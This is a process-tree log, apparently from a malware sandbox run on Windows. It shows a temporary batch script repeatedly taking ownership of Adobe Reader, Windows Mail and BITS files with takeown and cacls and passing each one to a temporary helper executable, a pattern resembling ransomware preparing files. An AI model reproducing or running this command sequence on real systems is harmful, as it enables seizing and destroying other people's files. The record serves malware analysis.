C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:976
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui"3⤵PID:1556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:1832
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "msoeres.dll.mui" -nobanner4⤵PID:1996
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:688
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""2⤵PID:1332
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C3⤵PID:1176
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"3⤵
- Modifies file permissions
PID:1472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "cryptocme2.sig" -nobanner3⤵PID:836
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "cryptocme2.sig" -nobanner4⤵PID:908
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1120
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""2⤵PID:1964
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C3⤵PID:1744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"3⤵PID:1216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "ended_review_or_form.gif" -nobanner3⤵PID:1980
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "ended_review_or_form.gif" -nobanner4⤵PID:1212
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""2⤵PID:1584
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C3⤵PID:220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"3⤵PID:964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "reviewers.gif" -nobanner3⤵PID:1556
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "reviewers.gif" -nobanner4⤵PID:1020
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""2⤵PID:688
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C3⤵PID:1188
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"3⤵PID:1176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "pmd.cer" -nobanner3⤵PID:1472
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "pmd.cer" -nobanner4⤵PID:1868
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:836
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""2⤵PID:1120
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C3⤵PID:884
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"3⤵
- Modifies file permissions
PID:1744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "server_lg.gif" -nobanner3⤵PID:1216
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "server_lg.gif" -nobanner4⤵PID:1112
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""2⤵PID:1756
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C3⤵PID:888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"3⤵
- Modifies file permissions
PID:220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "email_initiator.gif" -nobanner3⤵PID:964
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "email_initiator.gif" -nobanner4⤵PID:1340
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1556
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""2⤵PID:1944
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C3⤵PID:1788
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"3⤵
- Modifies file permissions
PID:1188
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "turnOnNotificationInTray.gif" -nobanner3⤵PID:1176
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "turnOnNotificationInTray.gif" -nobanner4⤵PID:2032
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1472
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""2⤵PID:836
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C3⤵PID:528
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"3⤵
- Modifies file permissions
PID:884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "pdf.gif" -nobanner3⤵PID:1744
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "pdf.gif" -nobanner4⤵PID:1212
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""2⤵PID:472
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C3⤵PID:1152
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"3⤵PID:888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "MinionPro-Bold.otf" -nobanner3⤵PID:220
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "MinionPro-Bold.otf" -nobanner4⤵PID:548
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:964
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""2⤵PID:1556
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C3⤵PID:232
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"3⤵PID:1788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "server_issue.gif" -nobanner3⤵PID:1188
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "server_issue.gif" -nobanner4⤵PID:1136
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1176
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""2⤵PID:1472
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:1256
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"3⤵PID:528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner3⤵PID:884
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner4⤵PID:1112
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1744
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""2⤵PID:1216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C3⤵PID:1432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"3⤵
- Modifies file permissions
PID:1152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "zy______.pfm" -nobanner3⤵PID:888
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "zy______.pfm" -nobanner4⤵PID:1340
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""2⤵PID:1488
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C3⤵PID:2036
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"3⤵PID:232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "CourierStd.otf" -nobanner3⤵PID:1788
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "CourierStd.otf" -nobanner4⤵PID:2032
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1188
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""2⤵PID:1176
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C3⤵PID:1984
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"3⤵PID:1256
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "brt.fca" -nobanner3⤵PID:528
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "brt.fca" -nobanner4⤵PID:1476
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:884
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""2⤵PID:1200
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C3⤵PID:1936
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"3⤵PID:1432
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "zx______.pfm" -nobanner3⤵PID:1152
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "zx______.pfm" -nobanner4⤵PID:548
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1020
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp""2⤵PID:1832
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C3⤵PID:472
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"3⤵
- Modifies file permissions
PID:1232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "eng.hyp" -nobanner3⤵PID:1956
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "eng.hyp" -nobanner4⤵PID:1440
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1868
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""2⤵PID:1828
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C3⤵PID:1680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"3⤵PID:1776
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner3⤵PID:1960
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner4⤵PID:660
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:368
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""2⤵PID:1864
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C3⤵PID:1472
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"3⤵PID:228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "zdingbat.txt" -nobanner3⤵PID:224
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "zdingbat.txt" -nobanner4⤵PID:436
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:860
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""2⤵PID:888
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C3⤵PID:1576
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"3⤵PID:1120
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "can32.clx" -nobanner3⤵PID:2036
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "can32.clx" -nobanner4⤵PID:360
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:232
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""2⤵PID:1788
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C3⤵PID:672
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"3⤵
- Modifies file permissions
PID:1412
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "TURKISH.TXT" -nobanner3⤵PID:1984
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "TURKISH.TXT" -nobanner4⤵PID:1212
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1256
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""2⤵PID:528
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C3⤵PID:1748
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"3⤵
- Modifies file permissions
PID:1944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "symbol.txt" -nobanner3⤵PID:1936
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "symbol.txt" -nobanner4⤵PID:1076
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:436
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""2⤵PID:1152
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C3⤵PID:1088
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"3⤵
- Modifies file permissions
PID:1808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "SYMBOL.TXT" -nobanner3⤵PID:472
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "SYMBOL.TXT" -nobanner4⤵PID:2032
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1232
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""2⤵PID:232
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"3⤵
- Modifies file permissions
PID:1488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "wab.exe" -nobanner3⤵PID:1412
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "wab.exe" -nobanner4⤵PID:1112
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1984
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui""2⤵PID:1256
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:1828
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui"3⤵PID:1748
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:320
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:1432
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1948
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""2⤵PID:1468
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:856
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"3⤵PID:1168
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "wabmig.exe" -nobanner3⤵PID:1440
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "wabmig.exe" -nobanner4⤵PID:1120
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat""2⤵PID:860
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C3⤵PID:1964
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat"3⤵
- Modifies file permissions
PID:1680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "qmgr1.dat" -nobanner3⤵PID:1476
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "qmgr1.dat" -nobanner4⤵PID:1776
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat""2⤵PID:1460
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C3⤵PID:1060
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat"3⤵PID:1472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "qmgr0.dat" -nobanner3⤵PID:1748
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "qmgr0.dat" -nobanner4⤵PID:228
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:320
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:1948
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:1188
-
-
